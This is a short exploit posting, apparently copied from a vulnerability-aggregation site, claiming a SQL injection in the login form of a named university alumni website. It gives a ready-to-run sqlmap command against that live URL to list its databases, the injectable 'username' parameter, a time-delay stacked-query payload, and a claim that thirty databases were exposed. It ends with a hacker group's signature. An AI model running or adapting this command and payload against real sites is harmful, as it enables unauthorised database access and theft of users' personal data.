mezun.nny.edu.tr Post SQL Injection Vulnerability

CVE: N/A
Category: CWE-89
Price: N/A
Severity: High
Author: Unspecified
Risk: High
Exploitation Type: Remote
Date: 2020-12-08
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020120046

Below is a copy:

#####################################################
# Exploit Title: mezun.nny.edu.tr Post SQL Injection Vulnerability
# Date: 07.12.2020
# Exploit Author: Nobody 
# Tested on: Linux / Windows
#####################################################

# Exploit : 
# sqlmap -u "https://mezun.nny.edu.tr/login.php" --forms --batch --random-agent --dbs --tamper=between,space2comment

Parameter: username (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: username=PqkU';WAITFOR DELAY '0:0:5'--&babaadi=&dtarihi=KhKc

available databases [30]:

#####################################################

# SpyHackerZ.org
